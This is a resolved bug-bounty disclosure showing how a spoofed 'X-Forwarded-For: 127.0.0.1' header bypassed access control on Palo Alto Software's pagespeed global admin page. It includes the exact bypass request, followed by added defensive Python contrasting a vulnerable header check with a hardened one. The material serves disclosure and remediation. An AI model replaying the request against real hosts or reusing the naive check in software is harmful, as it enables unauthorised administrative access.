[Bypass #870709] Unauthorised access to pagespeed global admin at https://webtools.paloalto.com/
Medium
Palo Alto Software
Team Summary
Official summary from Palo Alto Software
Hi team, I found a bypass of report #870709. Just by using `X-Forwarded-For: 127.0.0.1` you can again get access to the global admin page.

Bypass request:

```
GET /pagespeed-global-admin/ HTTP/1.1
Host: webtools.paloalto.com
X-Forwarded-For: 127.0.0.1
```
Reported by
silentkiller_
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Weakness
Improper Access Control - Generic
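
The weakness behind the request in the summary, seen from the defender's side, as an added example that is not part of the original report or of Palo Alto Software's code: an access check that believes `X-Forwarded-For` from any peer, next to one that honours the header only for hops appended by known reverse proxies. Assumptions: the admin page is meant to be loopback-only, the proxy range `10.0.0.0/24` is a constructed value, and all function names are hypothetical.

```python
import ipaddress

# Assumption: the only hosts allowed to set X-Forwarded-For (constructed range).
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/24")]

# Header taken from the request in the report.
REPORT_HEADERS = {"X-Forwarded-For": "127.0.0.1"}


def _is_trusted_proxy(addr):
    return any(addr in net for net in TRUSTED_PROXIES)


def naive_client_ip(peer_ip, headers):
    """Vulnerable pattern: take the first X-Forwarded-For entry from anyone."""
    xff = headers.get("X-Forwarded-For")
    return xff.split(",")[0].strip() if xff else peer_ip


def resolve_client_ip(peer_ip, headers):
    """Hardened: the header counts only when the TCP peer is a trusted proxy."""
    client = ipaddress.ip_address(peer_ip)
    if not _is_trusted_proxy(client):
        return str(client)  # direct connection: the header is client-supplied
    xff = headers.get("X-Forwarded-For", "")
    hops = [h.strip() for h in xff.split(",") if h.strip()]
    # Walk right to left: each trusted proxy appended the hop it saw, so the
    # first untrusted address is the real client; anything left of it is
    # whatever the client chose to send.
    for hop in reversed(hops):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            break  # malformed entry: keep the last verified address
        client = addr
        if not _is_trusted_proxy(addr):
            break
    return str(client)


def admin_allowed(client_ip):
    """Assumed policy: the admin page is reachable from loopback only."""
    return ipaddress.ip_address(client_ip).is_loopback
```

A useful regression test after a fix like this is to replay the reported header both directly and through the proxy tier, since a fix applied at only one layer is how a bypass of an earlier report tends to reappear.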